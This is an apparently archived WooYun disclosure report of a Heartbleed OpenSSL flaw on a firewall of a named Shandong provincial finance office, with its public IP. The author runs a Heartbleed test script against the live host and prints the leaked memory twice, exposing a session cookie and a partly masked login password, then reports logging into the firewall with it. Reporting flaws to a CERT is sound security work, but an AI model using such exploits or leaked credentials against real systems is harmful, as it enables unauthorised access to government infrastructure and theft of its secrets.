当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082885

漏洞标题:山东某机关单位防火墙openssl漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 火焰真菌

提交时间:2014-11-11 18:32

修复时间:2014-12-26 18:34

公开时间:2014-12-26 18:34

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-26: 细节向公众公开

简要描述:

山东某机关单位防火墙openssl漏洞

详细说明:

山东财政厅某防火墙https://60.216.5.94/

天融信登陆.JPG


测试存在openssl漏洞。
测试过程:

:\Python27>python.exe ssltest.py 60.216.5.94 -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1244
... received message: type = 22, ver = 0302, length = 397
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 F5 83 93 EB ....#...........
00e0: 16 60 7E 47 07 15 AE 68 3F 32 FC 28 71 DD 8D 2A .`~G...h?2.(q..*
00f0: E0 9E 03 AD 28 D9 89 2F 0F 07 AF C1 27 8E F1 57 ....(../....'..W
0100: FB C6 C4 D4 56 3A F6 ED 59 61 4A 17 14 0B D7 7C ....V:..YaJ....|
0110: AE FE 55 D9 7A A6 F6 C6 57 B5 3C ED 78 9D EE 39 ..U.z...W.<.x..9
0120: D8 67 02 09 92 CB A5 66 A3 48 3D 06 ED A5 02 2E .g.....f.H=.....
0130: 9B 16 F6 2B E7 3F 79 65 1A CB 6C 5C BD 6B AD 11 ...+.?ye..l\.k..
0140: DE BE DF 35 DB 0B FF 2C 90 94 32 B5 94 57 3D 5E ...5...,..2..W=^
0150: 25 D2 1B D2 44 85 96 31 28 69 D7 4A 13 0A 33 74 %...D..1(i.J..3t
0160: 00 00 75 4F 00 00 00 05 00 05 01 00 00 00 00 91 ..uO............
0170: 06 FA 96 4A 84 1C 48 3F 9A 56 F5 E9 FE 78 64 E7 ...J..H?.V...xd.
0180: 9A C0 D8 44 33 C0 5E 53 DA 2F 67 1D 33 57 97 B4 ...D3.^S./g.3W..
0190: 01 83 9B BF B7 5D 5E BC 57 81 90 D5 34 53 58 57 .....]^.W...4SXW
01a0: C4 14 A1 72 40 FD A4 E6 FB 3B 6A DD C6 86 F3 D5 ...r@....;j.....
01b0: 68 A2 31 66 6B 85 97 D1 54 1B 1C 74 41 24 BF F2 h.1fk...T..tA$..
01c0: DD B9 B8 17 57 5D 26 EC 1A 1D 8A 42 11 CC 61 E2 ....W]&....B..a.
01d0: AE 19 0B E4 3A A0 65 00 80 4C C3 CC 49 B0 18 F3 ....:.e..L..I...
01e0: 39 F0 33 A1 3B 75 57 83 99 EF 67 00 0D 00 22 00 9.3.;uW...g...".
01f0: 20 06 01 06 02 06 03 05 01 05 02 05 03 04 01 04 ...............
0200: 02 04 03 03 01 03 02 03 03 02 01 02 02 02 03 01 ................
0210: 01 00 0F 00 01 01 20 32 2E 30 2E 35 30 37 32 37 ...... 2.0.50727
0220: 3B 20 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 34 ; .NET CLR 3.0.4
0230: 35 30 36 2E 32 31 35 32 3B 20 2E 4E 45 54 20 43 506.2152; .NET C
0240: 4C 52 20 33 2E 35 2E 33 30 37 32 39 29 0D 0A 48 LR 3.5.30729)..H
0250: 6F 73 74 3A 20 31 32 33 2E 32 33 33 2E 31 31 36 ost: 123.233.116
0260: 2E 31 33 34 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E .134..Connection
0270: 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F : Keep-Alive..Co
0280: 6F 6B 69 65 3A 20 73 65 73 73 69 6F 6E 5F 69 64 okie: session_id
0290: 5F 34 34 33 3D 4D 54 55 32 4E 44 45 32 4D 6A 4D _443=MTU2NDE2MjM
02a0: 34 4E 44 49 33 4E 7A 6B 34 0D 0A 0D 0A 7C 9B 62 4NDI3Nzk4....|.b
02b0: 16 E8 93 D4 BE 87 50 DD 46 7B EF C6 EA AD C1 71 ......P.F{.....q
02c0: 7E 22 97 6D A6 76 E5 7C D0 9C F2 CB 70 61 73 73 ~".m.v.|....pass
02d0: 77 64 3D 53 64 63 7A 32 30 31 34 40 78 78 7A 78 wd=********@xxzx
02e0: 2E 67 6F 76 2E 63 6E 26 6C 6F 67 69 6E 53 75 62 .gov.cn&loginSub
02f0: 6D 69 74 49 70 74 3D F2 80 83 C1 86 F9 AE AB E3 mitIpt=.........
0300: 4A 32 21 F9 49 46 6F 00 00 00 00 00 00 00 00 00 J2!.IFo.........
0310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................


获取登陆密码:********@xxzx.gov.cn 部分密码用*替代。
登陆后界面:

天融信墙.JPG


只看了看信息。

漏洞证明:

山东财政厅某防火墙https://60.216.5.94/

天融信登陆.JPG


测试存在openssl漏洞。
测试过程:

:\Python27>python.exe ssltest.py 60.216.5.94 -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1244
... received message: type = 22, ver = 0302, length = 397
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 F5 83 93 EB ....#...........
00e0: 16 60 7E 47 07 15 AE 68 3F 32 FC 28 71 DD 8D 2A .`~G...h?2.(q..*
00f0: E0 9E 03 AD 28 D9 89 2F 0F 07 AF C1 27 8E F1 57 ....(../....'..W
0100: FB C6 C4 D4 56 3A F6 ED 59 61 4A 17 14 0B D7 7C ....V:..YaJ....|
0110: AE FE 55 D9 7A A6 F6 C6 57 B5 3C ED 78 9D EE 39 ..U.z...W.<.x..9
0120: D8 67 02 09 92 CB A5 66 A3 48 3D 06 ED A5 02 2E .g.....f.H=.....
0130: 9B 16 F6 2B E7 3F 79 65 1A CB 6C 5C BD 6B AD 11 ...+.?ye..l\.k..
0140: DE BE DF 35 DB 0B FF 2C 90 94 32 B5 94 57 3D 5E ...5...,..2..W=^
0150: 25 D2 1B D2 44 85 96 31 28 69 D7 4A 13 0A 33 74 %...D..1(i.J..3t
0160: 00 00 75 4F 00 00 00 05 00 05 01 00 00 00 00 91 ..uO............
0170: 06 FA 96 4A 84 1C 48 3F 9A 56 F5 E9 FE 78 64 E7 ...J..H?.V...xd.
0180: 9A C0 D8 44 33 C0 5E 53 DA 2F 67 1D 33 57 97 B4 ...D3.^S./g.3W..
0190: 01 83 9B BF B7 5D 5E BC 57 81 90 D5 34 53 58 57 .....]^.W...4SXW
01a0: C4 14 A1 72 40 FD A4 E6 FB 3B 6A DD C6 86 F3 D5 ...r@....;j.....
01b0: 68 A2 31 66 6B 85 97 D1 54 1B 1C 74 41 24 BF F2 h.1fk...T..tA$..
01c0: DD B9 B8 17 57 5D 26 EC 1A 1D 8A 42 11 CC 61 E2 ....W]&....B..a.
01d0: AE 19 0B E4 3A A0 65 00 80 4C C3 CC 49 B0 18 F3 ....:.e..L..I...
01e0: 39 F0 33 A1 3B 75 57 83 99 EF 67 00 0D 00 22 00 9.3.;uW...g...".
01f0: 20 06 01 06 02 06 03 05 01 05 02 05 03 04 01 04 ...............
0200: 02 04 03 03 01 03 02 03 03 02 01 02 02 02 03 01 ................
0210: 01 00 0F 00 01 01 20 32 2E 30 2E 35 30 37 32 37 ...... 2.0.50727
0220: 3B 20 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 34 ; .NET CLR 3.0.4
0230: 35 30 36 2E 32 31 35 32 3B 20 2E 4E 45 54 20 43 506.2152; .NET C
0240: 4C 52 20 33 2E 35 2E 33 30 37 32 39 29 0D 0A 48 LR 3.5.30729)..H
0250: 6F 73 74 3A 20 31 32 33 2E 32 33 33 2E 31 31 36 ost: 123.233.116
0260: 2E 31 33 34 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E .134..Connection
0270: 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F : Keep-Alive..Co
0280: 6F 6B 69 65 3A 20 73 65 73 73 69 6F 6E 5F 69 64 okie: session_id
0290: 5F 34 34 33 3D 4D 54 55 32 4E 44 45 32 4D 6A 4D _443=MTU2NDE2MjM
02a0: 34 4E 44 49 33 4E 7A 6B 34 0D 0A 0D 0A 7C 9B 62 4NDI3Nzk4....|.b
02b0: 16 E8 93 D4 BE 87 50 DD 46 7B EF C6 EA AD C1 71 ......P.F{.....q
02c0: 7E 22 97 6D A6 76 E5 7C D0 9C F2 CB 70 61 73 73 ~".m.v.|....pass
02d0: 77 64 3D 53 64 63 7A 32 30 31 34 40 78 78 7A 78 wd=********@xxzx
02e0: 2E 67 6F 76 2E 63 6E 26 6C 6F 67 69 6E 53 75 62 .gov.cn&loginSub
02f0: 6D 69 74 49 70 74 3D F2 80 83 C1 86 F9 AE AB E3 mitIpt=.........
0300: 4A 32 21 F9 49 46 6F 00 00 00 00 00 00 00 00 00 J2!.IFo.........
0310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
04f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
